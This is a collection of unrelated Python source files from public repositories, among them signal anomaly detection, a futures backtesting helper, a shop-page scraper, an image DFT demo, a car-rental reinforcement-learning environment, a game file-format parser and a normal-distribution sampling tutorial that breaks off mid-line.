SingleAnomaly(Anomaly):\r\n type: AnomalyType\r\n\r\n def extend(self, other: Self) -> None:\r\n if not self.type == other.type:\r\n return\r\n if self.start > other.start:\r\n self.start = other.start\r\n if self.end < other.end:\r\n self.end = other.end\r\n\r\n def convert(self) -> \"MergedAnomalies\":\r\n return MergedAnomalies(self.start, self.end, {self.type : [self]})\r\n\r\n def __str__(self) -> str:\r\n return f\"{self.start}-{self.end}: {str(self.type)}\"\r\n\r\n\r\n@dataclass\r\nclass MergedAnomalies(Anomaly):\r\n type: dict[AnomalyType,list[SingleAnomaly]]\r\n\r\n def extend(self, other: SingleAnomaly| Self):\r\n if self.start > other.start:\r\n self.start = other.start\r\n\r\n if self.end < other.end:\r\n self.end = other.end\r\n\r\n if isinstance(other, SingleAnomaly):\r\n if other.type == AnomalyType.line:\r\n ...\r\n self._extend_anomaly(other)\r\n\r\n else:\r\n for key in other.type:\r\n if key == AnomalyType.line:\r\n ...\r\n anomalies = other.type[key]\r\n for anomaly in anomalies:\r\n self._extend_anomaly(anomaly)\r\n \r\n \r\n\r\n def __str__(self) -> str:\r\n return f\"{self.start}-{self.end}: {', '.join(list(self.type))}\"\r\n \r\n def length(self,type:AnomalyType | None = None) -> float:\r\n if type:\r\n if not self.type.get(type):\r\n return 0.\r\n return sum([anomaly.length() for anomaly in self.type[type]])\r\n return self.end - self.start\r\n \r\n def _extend_anomaly(self,other: SingleAnomaly):\r\n if other.type == AnomalyType.line:\r\n ...\r\n anomalies = self.type.get(other.type)\r\n if not anomalies:\r\n self.type[other.type] = [other]\r\n else:\r\n overlaps = []\r\n distances = []\r\n for anomaly in self.type[other.type]:\r\n overlaps.append(other.overlap(anomaly))\r\n distances.append(other.distance(anomaly))\r\n id = overlaps.index(max(overlaps))\r\n if overlaps[id] == 0:\r\n id_dist = distances.index(min(distances))\r\n if distances[id_dist] <= load_config().distance:\r\n anomalies[id_dist].extend(deepcopy(other))\r\n else:\r\n anomalies.append(deepcopy(other))\r\n else:\r\n anomalies[id].extend(deepcopy(other))\r\n\r\n @classmethod\r\n def join(cls, *arg: SingleAnomaly | Self) -> Self:\r\n start = min([anomaly.start for anomaly in arg])\r\n end = max([anomaly.end for anomaly in arg])\r\n tmp = cls(start,end,{})\r\n\r\n for anomaly in arg:\r\n if isinstance(anomaly,MergedAnomalies):\r\n for key in anomaly.type.keys():\r\n for single_anomaly in anomaly.type[key]:\r\n tmp.extend(single_anomaly)\r\n else:\r\n tmp.extend(anomaly)\r\n\r\n return tmp\r\n\r\n\r\n\r\ndef window_average(values: npt.NDArray, window_size: int) -> tuple[npt.NDArray, float]:\r\n for idx, window in enumerate(np.lib.stride_tricks.sliding_window_view(values, window_size)[window_size:]):\r\n values[window_size + idx] = window.mean()\r\n\r\n peaks = find_peaks(values)\r\n return values, len(peaks)\r\n\r\n\r\ndef find_peaks_filtered(values: npt.NDArray, wavelet_len: float, wavelet: Callable):\r\n filtered = cwt(values, wavelet, [wavelet_len])\r\n return find_peaks(filtered[0])[0]\r\n\r\n\r\n@dataclass\r\nclass Signal:\r\n signal: npt.NDArray\r\n fs: int # sampling frequency of the signal\r\n peaks_per_second: float\r\n path: Path\r\n window_indexes: npt.NDArray = field(init=False)\r\n wavelet: Callable\r\n wavelet_len: float\r\n\r\n @classmethod\r\n def load_signal(\r\n cls,\r\n path: Path,\r\n type: SignalType,\r\n cpu_count: int | None = os.cpu_count(),\r\n wavelet_len: float = 5,\r\n wavelet: Callable = ricker,\r\n ):\r\n \"\"\"\r\n load the signal file into memory\r\n\r\n Args:\r\n path (Path): path to the signal file\r\n type (SignalType): which signal from file load\r\n\r\n Returns:\r\n Signal: signal object with loaded signal\r\n \"\"\"\r\n cpu_count = cpu_count if cpu_count else 1\r\n signals, fields = wfdb.rdsamp(path)\r\n\r\n signal_type = fields[\"sig_name\"].index(type.value)\r\n signal: npt.NDArray = signals[:, signal_type].astype(np.float64)\r\n del signals\r\n\r\n split = np.array_split(signal, cpu_count)\r\n # filtered_signal, peaks = window_average(signal,average_window_size)\r\n\r\n # peaks_per_second = peaks / (len(signal)/fields[\"fs\"])\r\n\r\n peak_finding = partial(find_peaks_filtered, wavelet_len=wavelet_len, wavelet=ricker)\r\n\r\n # preprocess signal in parallel on splitted signal\r\n with multiprocessing.Pool(cpu_count) as pool:\r\n preprocessed_signal = pool.map(peak_finding, split)\r\n\r\n peaks_per_second = np.sum([len(peaks_window) for peaks_window in preprocessed_signal]) / (len(signal) / fields[\"fs\"])\r\n\r\n return cls(\r\n signal=signal,\r\n fs=fields[\"fs\"],\r\n peaks_per_second=peaks_per_second,\r\n path=path,\r\n wavelet=wavelet,\r\n wavelet_len=wavelet_len,\r\n )\r\n\r\n def look(self, start: float, end: float, peaks: bool = True):\r\n \"\"\"\r\n Open graph window with time series of the signal in specified range. Unit are in the seconds\r\n\r\n Args:\r\n start (float): start of the range (in seconds)\r\n end (float): end of the range (in seconds)\r\n peaks (bool, optional): Whether to visualize peaks. Defaults to True.\r\n \"\"\"\r\n _, axes = plt.subplots()\r\n values = self.signal[ceil(start * self.fs) : floor(end * self.fs)]\r\n sns.lineplot(y=values, x=np.arange(start, end, 1 / self.fs), ax=axes)\r\n if peaks:\r\n found_peaks = find_peaks_filtered(values, self.wavelet_len, self.wavelet)\r\n sns.scatterplot(x=(found_peaks / self.fs) + start, y=[values[t] for t in found_peaks], ax=axes, color=PEAK_COLOR)\r\n plt.show(block=True)\r\n\r\n def check(\r\n self,\r\n anomaly: AnomalyType,\r\n th: float,\r\n config: AnomalyConfig,\r\n window_size: float = 5,\r\n stride: float | None = None,\r\n ) -> list[SingleAnomaly]:\r\n anomalies: list[SingleAnomaly] = []\r\n detected = False\r\n index = 0\r\n start = 0\r\n window_size = floor(window_size * self.fs)\r\n stride = floor(stride * self.fs) if stride else 1\r\n self.window_indexes = np.arange(0, window_size, 1)\r\n prev_anomaly: SingleAnomaly | None = None\r\n\r\n for idx, window in enumerate(np.lib.stride_tricks.sliding_window_view(self.signal, window_size)[::stride, :]):\r\n anomaly_index = getattr(self, f\"filter_{anomaly}\")(window, th=th)\r\n if isinstance(anomaly_index,tuple):\r\n if not detected:\r\n start = anomaly_index[0] + idx * stride\r\n detected = True\r\n index =idx * stride + anomaly_index[1]\r\n elif detected:\r\n current_anomaly = SingleAnomaly(start / self.fs, index / self.fs, anomaly)\r\n if prev_anomaly and prev_anomaly.distance(current_anomaly) <= config.distance:\r\n prev_anomaly.extend(current_anomaly)\r\n continue\r\n \r\n anomalies.append(current_anomaly)\r\n prev_anomaly = current_anomaly\r\n detected = False\r\n\r\n if detected:\r\n current_anomaly = SingleAnomaly(start / self.fs, index / self.fs, anomaly)\r\n if prev_anomaly and prev_anomaly.distance(current_anomaly) <= config.distance:\r\n prev_anomaly.extend(current_anomaly)\r\n else:\r\n anomalies.append(current_anomaly)\r\n\r\n\r\n return anomalies\r\n\r\n # === filtering functions===\r\n def filter_max(\r\n self,\r\n window: npt.NDArray,\r\n th: int = 90,\r\n ) -> tuple[int,int]| None:\r\n idx = np.argwhere(window >= th)\r\n if idx.size > 0 :\r\n return idx[0][0], idx[0][-1]\r\n\r\n def filter_min(self, window: npt.NDArray, th: int = -30) -> tuple[int,int] | None:\r\n idx = np.argwhere(window <= th)\r\n if idx.size > 0 :\r\n return idx[0][0], idx[0][-1]\r\n\r\n def filter_line(self, window: npt.NDArray, th: float = 0.03) -> tuple[int,int] | None:\r\n coef = np.polynomial.polynomial.Polynomial.fit(self.window_indexes, window, 1)\r\n if np.sqrt(np.power(coef(window) - window, 2)).mean() < th:\r\n return 0, window.shape[0]\r\n\r\n def filter_peaks(self, window: npt.NDArray, th: float = 0.5) -> tuple[int,int]| None:\r\n peaks = find_peaks_filtered(window, self.wavelet_len, self.wavelet)\r\n seconds = len(window) / self.fs\r\n peaks_per_second = len(peaks) / seconds\r\n\r\n if peaks_per_second > self.peaks_per_second * (1 + th) or peaks_per_second < self.peaks_per_second * (1 - th):\r\n return 0, window.shape[0]\r\n\r\n # ==========================\r\n","repo_name":"daviholy/aso1","sub_path":"src/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":11478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17043346424","text":"# -*- coding: utf-8 -*-\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 3 11:20:31 2017\n\n@author: Heng\n\"\"\"\n\nimport calendar\nfrom datetime import timedelta\n\n\nimport pandas as pd \nfrom enum import Enum\n\n\ndef toMonthCode(ticker,monthCode):\n tickerCode = list()\n for t in ticker:\n code = monthCode[t]\n tickerCode.append(code)\n\n return tickerCode\n \n \n#def generateTrade(signal_list,mktData,risk_limit,long_bond,short_bond,today):\n# raw_trades = list()\n# #t1 = trade(\"X08\",10,1.25,today)\n# for key in list(signal_list.index):\n# s = signal_list.loc[key]['signal']\n# amount = 10 if s= 15 else d + timedelta(weeks=1)\n \ndef contractDate(d,n):\n Maturity = list()\n \n Exp_thisMonth = calendar.Calendar(2).monthdatescalendar(d.year, d.month)[3][0]\n if Exp_thisMonth >= d:\n Maturity.append(Exp_thisMonth)\n else:\n Maturity.append(next_third_Wednesday(Exp_thisMonth))\n \n for i in range(n-1):\n Maturity.append(next_third_Wednesday(Maturity[i]))\n \n return Maturity\n\ndef expiryCalc(ticker,today):\n dates = contractDate(today,7)\n monthMap = {\"F\":1, \"G\":2, \"H\":3,\"J\":4,\"K\":5, \"M\":6, \"N\":7,\"Q\":8,\"U\":9, \"V\":10, \"X\":11,\"Z\":12}\n code = ticker.split(\"_\") \n month = monthMap[code[1][0]]\n for date in dates:\n if month == date.month : expiry = date - today\n \n return expiry.days\n\n\n\n \ndef contractCode(d,n):\n monthcode = {1:\"F\", 2:\"G\", 3:\"H\",4:\"J\",5:\"K\", 6:\"M\", 7:\"N\",8:\"Q\",9:\"U\", 10:\"V\", 11:\"X\",12:\"Z\"}\n dates = contractDate(d,n)\n code_list = list(map(lambda aday: monthcode[aday.month] + str(aday.year)[2:],dates))\n code = dict()\n contract_list = ['f1','f2','f3','f4','f5','f6','f7']\n for i in range(len(code_list)):\n code[contract_list[i]] = code_list[i]\n\n for i in range(0,len(code_list)-1):\n for j in range(i+1,len(code_list)):\n futName = contract_list[j]+\"_\"+contract_list[i]\n monName = code[contract_list[j]]+\"_\"+code[contract_list[i]]\n code[futName] = monName\n \n return code\n\ndef tradeFilter(tradeList, priority, monthCodeMap):\n priority_code = list()\n\n for ticker in priority:\n priority_code.append(monthCodeMap[ticker])\n priorityMap = dict()\n TopOrder = 100 # this looks stupid, is there a better to get Top priority trade\n TopOrderTrade = None\n for trade in tradeList:\n ticker = trade.ticker\n order = priority_code.index(ticker)\n priorityMap[ticker] = order\n if TopOrder > order:\n TopOrder = order\n TopOrderTrade = trade\n tradeList = list()\n tradeList.append(TopOrderTrade) \n return tradeList\n\n\n\n\n\n \n\n\n\n","repo_name":"project-rubick/master","sub_path":"BackTestingHeader.py","file_name":"BackTestingHeader.py","file_ext":"py","file_size_in_byte":4591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6218304812","text":"import logging\nimport random\nimport re\nimport sys\nfrom time import sleep\n\nimport requests\n\nlogger = logging.getLogger(__name__)\n\nSECRETS = []\nSECRET_TEXT = 'Sie haben einen Geist gefunden'\nUSER_AGENT = 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0'\n\n\ndef check_article_for_secret(s: requests.Session, pr_link: str, ref_link: str):\n '''\n Checks an article for a secret and stores the article number if it exists\n '''\n\n try:\n r = s.get(\n url=pr_link,\n headers={ 'Referer': ref_link }\n )\n\n except requests.exceptions.RequestException:\n logger.error('[-] Request failed, terminating...', exc_info=True)\n sys.exit(1)\n\n data = r.text\n\n if data.find(SECRET_TEXT) != -1:\n logger.info(f'[+] Found secret at {pr_link}')\n g = re.findall(r'(\\d*)<', data)\n SECRETS.append(g[0])\n\n\ndef get_articles(s: requests.Session, mf_link: str):\n '''\n Finds all products and checks each for a secret\n '''\n\n try:\n r = s.get(\n url=mf_link,\n headers={ 'Referer': 'https://www.mindfactory.de/' }\n )\n\n except requests.exceptions.RequestException:\n logger.error('[-] Request failed, terminating...', exc_info=True)\n sys.exit(1)\n\n articles = re.findall(r'\"(.*)\" class=\"p-complete-link visible-xs visible-sm', r.text)\n\n for article_link in articles:\n check_article_for_secret(s, article_link, mf_link)\n\n\ndef main():\n '''\n finds hidden secrets on mindfactory\n '''\n\n all_links = ['']\n\n sess = requests.Session()\n\n # set user cookies\n sess.cookies.set('NSid', '', domain='.mindfactory.de', path='/')\n sess.cookies.set('lz_userid', '', domain='chat.mindfactory.de', path='/livezilla')\n sess.cookies.set('cookies_accepted', 'true')\n\n # set user agent\n sess.headers.update({'User-Agent': USER_AGENT})\n\n for link in all_links:\n\n if not link.endswith('/article_per_page/5'):\n link = f'{link}/article_per_page/5'\n\n get_articles(sess, link)\n logger.debug('Waiting for next link...')\n sleep(3)\n\n if SECRETS:\n logger.info(f'[+] article numbers: {\",\".join(SECRETS)}')\n else:\n logger.warn('[-] No secrets found?')\n\n return 0\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(levelname)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filename='spam.log',\n filemode='a'\n )\n c = logging.StreamHandler()\n c.setLevel(logging.INFO)\n f = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n c.setFormatter(f)\n logger.addHandler(c)\n sys.exit(int(main() or 0))\n","repo_name":"HeleleF/scraper","sub_path":"mfscraper.py","file_name":"mfscraper.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13883801543","text":"# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\nimport cv2\r\nfrom matplotlib import pyplot as plt\r\n\r\n# 画像をグレースケールで読み込む\r\nimg = cv2.imread('/Users/kiyotakoki/dev/com_vis/07_DFT/sakurajima.jpeg',0)\r\n\r\n# DFT\r\ndft = cv2.dft(np.float32(img),flags = cv2.DFT_COMPLEX_OUTPUT)\r\n# 結果をシフト\r\ndft_shift = np.fft.fftshift(dft)\r\n\r\n# 見易いスケールに変換\r\nmagnitude_spectrum = 20*np.log(cv2.magnitude(dft_shift[:,:,0],dft_shift[:,:,1]))\r\n\r\nplt.subplot(121),plt.imshow(img, cmap = 'gray')\r\nplt.title('Input Image'), plt.xticks([]), plt.yticks([])\r\nplt.subplot(122),plt.imshow(magnitude_spectrum, cmap = 'gray')\r\nplt.title('Magnitude Spectrum'), plt.xticks([]), plt.yticks([])\r\nplt.show()\r\n\r\ncv2.imwrite(\"magnitude_spectrum.png\", magnitude_spectrum)\r\n\r\n","repo_name":"kkiyota63/ImageProcessing","sub_path":"07_DFT/07_sample01.py","file_name":"07_sample01.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"470428478","text":"import numpy as np\nimport sys\nimport math\n\nfrom gym.envs.toy_text import discrete\n\ndef clipped_poisson(lam, max_k):\n \"\"\"\n Return poisson PMF clipped at max_k with remaining tail probability\n placed at max_k.\n \"\"\"\n pmf = np.zeros(max_k + 1)\n for k in range(max_k):\n pmf[k] = math.exp(-lam) * lam**k / math.factorial(k)\n pmf[max_k] = 1 - np.sum(pmf)\n \n return pmf \n\n\nclass JackCarRentalEnv(discrete.DiscreteEnv):\n \"\"\" Example 4.2 from Reinforcement Learning: An Introduction by Sutton and Barto.\n \"\"\"\n\n def build_pmfs(self, lambda_request, lambda_return, max_cars):\n \"\"\"\n Return p(new_rentals, returns | initial_cars) as numpy array:\n p[initial_cars, new_rentals, returns]\n \"\"\"\n pmf = np.zeros((max_cars+1, max_cars+1, max_cars+1))\n\n for init_cars in range(max_cars + 1):\n new_rentals_pmf = clipped_poisson(lambda_request, init_cars)\n for new_rentals in range(init_cars + 1):\n max_returns = max_cars - init_cars + new_rentals\n returns_pmf = clipped_poisson(lambda_return, max_returns)\n for returns in range(max_returns + 1):\n p = returns_pmf[returns] * new_rentals_pmf[new_rentals]\n pmf[init_cars, new_rentals, returns] = p\n \n return pmf\n\n def get_transition_model(self, s, a):\n \"\"\"\n Inputs: state as 2-tuple / action as -2,-1,0,1,2 [-max,max]\n Returns a 2-tuple:\n 1. p(s'| s, a) as dictionary:\n keys = s'\n values = p(s' | s, a)\n 2. E(r | s, a, s') as dictionary:\n keys = s'\n values = E(r | s, a, s')\n \"\"\"\n s = (s[0] - a, s[1] + a) # move a cars from loc1 to loc2 \n s = np.clip(s,0,self.max_cars) # impossible actions are cliped to possible states\n\n move_reward = -math.fabs(a) * 2 # ($2) per car moved\n t_prob, expected_r = ([{}, {}], [{}, {}])\n for loc in range(2):\n morning_cars = s[loc]\n rent_return_pmf = self.rent_return_pmf[loc]\n for rents in range(morning_cars + 1):\n max_returns = self.max_cars - morning_cars + rents\n for returns in range(max_returns + 1):\n p = rent_return_pmf[morning_cars, rents, returns]\n if p < 1e-5:\n continue\n s_prime = morning_cars - rents + returns\n r = rents * 10\n t_prob[loc][s_prime] = t_prob[loc].get(s_prime, 0) + p\n expected_r[loc][s_prime] = expected_r[loc].get(s_prime, 0) + p * r\n \n # join probabilities and expectations from loc1 and loc2\n t_model, r_model = ({}, {})\n for s_prime1 in t_prob[0]:\n for s_prime2 in t_prob[1]:\n p1 = t_prob[0][s_prime1] # p(s' | s, a) for loc1\n p2 = t_prob[1][s_prime2] # p(s' | s, a) for loc2\n t_model[(s_prime1, s_prime2)] = p1 * p2\n # expectation of reward calculated using p(s', r | s, a)\n # need to normalize by p(s' | s, a)\n norm_E1 = expected_r[0][s_prime1] / p1\n norm_E2 = expected_r[1][s_prime2] / p2\n\n norm_E1 = 10*round(norm_E1 / 10)\n norm_E2 = 10*round(norm_E2 / 10)\n\n r_model[(s_prime1, s_prime2)] = norm_E1 + norm_E2 + move_reward\n \n return t_model, r_model\n\n\n\n\n\n def __init__(self, max_cars = 4, rents_per_day = (3,4), returns_per_day = (3,2) ):\n \"\"\" The environment is a DiscreteEnv Gym with the following members:\n - nS: number of states\n - nA: number of actions\n - P: transitions (*)\n - isd: initial state distribution (**)\n (*) dictionary dict of dicts of lists, where\n P[s][a] == [(probability, nextstate, reward, done), ...]\n (**) list or array of length nS\n \"\"\"\n\n self.max_cars = max_cars\n self.max_move_cars = int(max_cars / 4)\n self.grid_shape = (max_cars+1,max_cars+1)\n self.rents_per_day = rents_per_day\n self.returns_per_day = returns_per_day\n\n print(\"Initialized JackCarRental Environment : %d max_cars %d max_moving cars\"%(max_cars,self.max_move_cars))\n\n nS = np.prod(self.grid_shape)\n nA = len(np.arange(-self.max_move_cars, self.max_move_cars + 1))\n\n # pre-build the rentals/returns pmf for each location\n self.rent_return_pmf = [self.build_pmfs(self.rents_per_day[i], self.returns_per_day[i], max_cars) for i in [0,1] ]\n\n P = {}\n for s_index in range(nS):\n s = np.unravel_index(s_index, self.grid_shape)\n P[s_index] = { a : [] for a in range(nA) }\n\n max_a = min(self.max_move_cars, s[0], max_cars-s[1])\n min_a = max(-self.max_move_cars, -s[1], -(max_cars-s[0]))\n \n for a_real in range(min_a, max_a+1):\n a = a_real + self.max_move_cars\n state_real = np.array(s) + np.array([-a_real, a_real])\n\n t_model, r_model = self.get_transition_model(s, a_real)\n for sp in t_model:\n p = t_model[sp]\n r = r_model[sp]\n sp_index = np.ravel_multi_index(sp,self.grid_shape)\n P[s_index][a].append([p, sp_index, r, False])\n\n isd = np.zeros(nS)\n isd[int(nS/2)] = 1.0\n super(JackCarRentalEnv, self).__init__(nS, nA, P, isd)\n\n def render(self):\n print(\"nothing to render\")\n\n\n","repo_name":"santmarti/SDIC-Code","sub_path":"notebooks/environments/jackcar.py","file_name":"jackcar.py","file_ext":"py","file_size_in_byte":5642,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"10131910528","text":"import numpy as np\n\n\nclass LinearGaussianPolicy:\n\n def __init__(self, weights=None, noise=None):\n if weights is not None:\n self.weights = weights\n self.output, self.input = self.weights.shape\n if noise is not None and isinstance(noise, (int, float, complex)):\n noise = np.diag(np.ones(self.output)*noise)\n self.noise = noise\n\n def get_weights(self):\n return self.weights\n\n def set_weights(self, weights, noise=None):\n self.weights = weights\n self.output, self.input = self.weights.shape\n if noise is not None and isinstance(noise, (int, float, complex)):\n noise = np.diag(np.ones(self.output)*noise)\n self.noise = noise\n\n def _add_noise(self):\n noise = np.random.multivariate_normal(np.zeros(self.output), self.noise, 1).T\n return noise\n\n def act(self, X, stochastic=True):\n X = X.reshape(self.input, 1)\n y = np.dot(self.weights, X)\n if self.noise is not None and stochastic:\n y += self._add_noise()\n return y\n\n def step(self, X, stochastic=False):\n return None, self.act(X, stochastic), None, None\n\n def compute_gradients(self, X, y, diag=False):\n X = np.array(X).reshape(self.input, 1)\n y = np.array(y).reshape(self.output, 1)\n mu = np.dot(self.weights, X)\n if diag:\n return np.diag((np.dot(np.linalg.inv(self.noise), np.dot((y - mu), X.T))))\n else:\n return (np.dot(np.linalg.inv(self.noise), np.dot((y - mu), X.T))).flatten()\n","repo_name":"gioramponi/sigma-girl-MIIRL","sub_path":"policies/linear_gaussian_policy.py","file_name":"linear_gaussian_policy.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"38949272652","text":"# Source: http://www.metroid2002.com/retromodding/wiki/HINT_(File_Format)\n\nimport dataclasses\nimport struct\n\nfrom util import unpack_null_terminated_ascii, pack_null_terminated_ascii\n\n__all__ = (\"HintLocation\", \"Hint\", \"HINT\")\n\n\n@dataclasses.dataclass(frozen=True)\nclass HintLocation:\n _struct = struct.Struct(\">IIII\")\n\n world_MLVL_asset_ID: int\n room_MREA_asset_ID: int\n room_index: int\n map_text_STRG_asset_ID: int\n\n @classmethod\n def from_packed(cls, packed: bytes):\n return cls(*cls._struct.unpack(packed))\n\n @property\n def packed_size(self) -> int:\n return 4 + 4 + 4 + 4\n\n def packed(self) -> bytes:\n return self._struct.pack(\n self.world_MLVL_asset_ID,\n self.room_MREA_asset_ID,\n self.room_index,\n self.map_text_STRG_asset_ID,\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass Hint:\n _struct = struct.Struct(\">ffIII\")\n\n name: str\n immediate_time: float\n normal_time: float\n text_STRG_asset_ID: int\n page_count: int\n location_count: int\n locations: tuple = dataclasses.field(repr=False)\n\n @classmethod\n def from_packed(cls, packed: bytes):\n offset = packed.index(b\"\\x00\") + 1\n name = unpack_null_terminated_ascii(packed[:offset])\n\n immediate_time, normal_time, text_STRG_asset_ID, \\\n page_count, location_count = cls._struct.unpack(packed[offset:offset+20])\n offset += 20\n\n return cls(\n name,\n immediate_time,\n normal_time,\n text_STRG_asset_ID,\n page_count,\n location_count,\n tuple(HintLocation.from_packed(packed[offset + 16*i:offset + 16*(i+1)]) for i in range(location_count)),\n )\n\n @property\n def packed_size(self) -> int:\n return len(self.packed())\n\n def packed(self) -> bytes:\n return b\"\".join((\n pack_null_terminated_ascii(self.name),\n self._struct.pack(\n self.immediate_time,\n self.normal_time,\n self.text_STRG_asset_ID,\n self.page_count,\n self.location_count,\n ),\n *(location.packed() for location in self.locations),\n ))\n\n\n@dataclasses.dataclass(frozen=True)\nclass HINT:\n _struct = struct.Struct(\">III\")\n\n magic: int\n version: int\n hint_count: int\n hints: tuple = dataclasses.field(repr=False)\n\n @classmethod\n def from_packed(cls, packed: bytes):\n magic, version, hint_count = cls._struct.unpack(packed[:12])\n\n offset = 12\n hints = []\n for i in range(hint_count):\n hint = Hint.from_packed(packed[offset:])\n hints.append(hint)\n offset += hint.packed_size\n\n return cls(magic, version, hint_count, tuple(hints))\n\n @property\n def packed_size(self) -> int:\n return len(self.packed())\n\n def packed(self) -> bytes:\n return b\"\".join(\n self._struct.pack(self.magic, self.version, self.hint_count),\n *(hint.packed() for hint in self.hints),\n )\n\n def with_hints_replaced(self, new_hints):\n new_hints = tuple(new_hints)\n return dataclasses.replace(self, hint_count=len(new_hints), hints=new_hints)","repo_name":"SpaghettiToastBook/echoes-patching-library","sub_path":"hint.py","file_name":"hint.py","file_ext":"py","file_size_in_byte":3266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72077204967","text":"import os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\ndef database_infos_func():\n database_infos = {\n \"app_key\": \"app_key\",\n \"app_secret\": \"33app_secret7f2cb08516d060a37c47243b91d20f\",\n \"codigo_conta_corrente\": \"codigo_conta_corrente\",\n \"estoque_box\": \"estoque_box\",\n \"codigo_local_estoque_galpao\": \"codigo_local_estoque_galpao\",\n \"app_key_parceiro\": os.getenv(\"APP_KEY_PARCEIRO\"),\n \"app_secret_parceiro\": os.getenv(\"APP_SECRET_PARCEIRO\")\n }\n return database_infos","repo_name":"VinicioSales/controladorDeEstoques","sub_path":"config/credenciais/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72870935848","text":"\n\n\"\"\"\nDerivation of the normalizing constant for the standard Normal distribution\n===========================================================================\n\nBelow we illustrate how to derive this constant analytically and and how to\napproximate it by sampling.\n\nAnalytical derivation\n---------------------\n\nThe probability density function of a standard Normal distribution, :math:`f_Z(z)` is\n\n.. math::\n f_Z(z)=\\\\frac{1}{K}\\exp(-\\\\frac{z^2}{2})\n\nBecause :math:`f_Z(z)` is a probability density function, it follows that\n\n.. math::\n 1=\\int_{-\\infty}^\\infty f_Z(z)dz=\\\\frac{1}{K}\\int_{-\\infty}^\\infty\\exp(-\\\\frac{z^2}{2})dz\n\nThen\n\n.. math::\n \\\\begin{align}\n K&=\\int_{-\\infty}^\\infty\\exp(-\\\\frac{z^2}{2})dz\\\\\\\\\n K^2&=\\int_{-\\infty}^\\infty\\int_{-\\infty}^\\infty\\exp(-\\\\frac{x^2}{2})\\exp(-\\\\frac{y^2}{2})dxdy=\\int_{-\\infty}^\\infty\\int_{-\\infty}^\\infty\\exp(-\\\\frac{x^2+y^2}{2}))dxdy\n \\\\end{align}\n\n\nWe now make the change of variables\n\n.. math::\n \\\\begin{align}\n r&=\\sqrt{x^2+y^2}\\\\\\\\\n \\\\theta&=\\\\arctan(\\\\frac{x}{y})\n \\\\end{align}\n\n\nfor which\n\n.. math::\n \\\\begin{align}\n x(r,\\\\theta)&=r\\cos(\\\\theta)\\\\\\\\\n y(r,\\\\theta)&=r\\sin(\\\\theta)\n \\\\end{align}\n\nwith Jacobian\n\n.. math::\n \\\\begin{align}\n J(r,\\\\theta)=\\\\left |\\\\begin{array}{cc}\n \\\\frac{\\\\partial x}{\\\\partial r}(r,\\\\theta)&\\\\frac{\\\\partial x}{\\\\partial \\\\theta}(r,\\\\theta)\\\\\\\\\n \\\\frac{\\\\partial y}{\\\\partial r}(r,\\\\theta)&\\\\frac{\\\\partial y}{\\\\partial \\\\theta}(r,\\\\theta)\n \\\\end{array}\\\\right |\n =\\\\left |\\\\begin{array}{cc}\n \\cos(\\\\theta) & -r\\sin(\\\\theta)\\\\\\\\\n \\sin(\\\\theta) & r\\cos(\\\\theta)\n \\\\end{array}\\\\right |\n =r\\\\cos^2(\\\\theta)+r\\\\sin^2(\\\\theta)=r(\\\\cos^2(\\\\theta)+\\\\sin^2(\\\\theta))=r\n \\\\end{align}\n\nand obtain\n\n.. math::\n \\\\begin{align}\n K^2&=\\int_0^{2\\pi}\\int_0^\\infty\\exp(-\\\\frac{r^2}{2}))|J(r,\\\\theta)|drd\\\\theta=\\int_0^{2\\pi}\\int_0^\\infty\n r\\exp(-\\\\frac{r^2}{2})drd\\\\theta=\\int_0^{2\\pi}\\left(\\left.\\exp(-\\\\frac{r^2}{2}))\\\\right\n |_0^\\infty\\\\right)d\\\\theta\\\\\\\\\n &=\\int_0^{2\\pi}1d\\\\theta=2\\pi\n \\\\end{align}\n\nthen :math:`K=\\sqrt{2\\pi}\\simeq 2.51`.\n\nEstimation by sampling\n----------------------\n\nWe can also estimate :math:`K` by sampling. :math:`K` is the area under the\nfunction :math:`\\\\tilde{f}_Z(z)=\\\\exp(-\\\\frac{z^2}{2})`. To estimate this area\nwe \n\n\n1. enclose most of the function :math:`\\\\tilde{f}_Z(z)` by a box, \n\n2. draw uniformly distributed samples in this box.\n\n3. calculate the proportion of samples below :math:`\\\\tilde{f}_Z(z)`.\n\nNow, the ratio of the area under the function :math:`\\\\tilde{f}_Z(z)`,\n:math:`K`, to the area\nof the enclosing box, :math:`B`, should be similar to the proportion of uniformly distributed\nsamples in the box that fell below function :math:`\\\\tilde{f}_Z(z)`,\n:math:`p\\_under`. That is :math:`\\\\frac{K}{B}\\\\simeq p\\_under`, or\n:math:`K\\simeq B\\;p\\_under`.\n\n\"\"\"\n\n#%%\n# Import requirements\n# -------------------\n\nimport numpy as np\nimport plotly.graph_objects as go\n\n\n#%%\n# Define constant\n# ---------------\n\nlower_z = -5.0\nupper_z = 5.0\nn_z = 1000\nn_random = 100000\n\nzs = np.linspace(lower_z, upper_z, n_z)\nf_hat = lambda z: np.exp(-z**2/2)\nf_hat_values = f_hat(zs)\nbox_height = f_hat(0)\nbox = np.ones(n_z)\n\n#%%\n# Sample uniform points in the box\n# --------------------------------\n\nrandom_x = np.random.uniform(low=lower_z, high=upper_z, 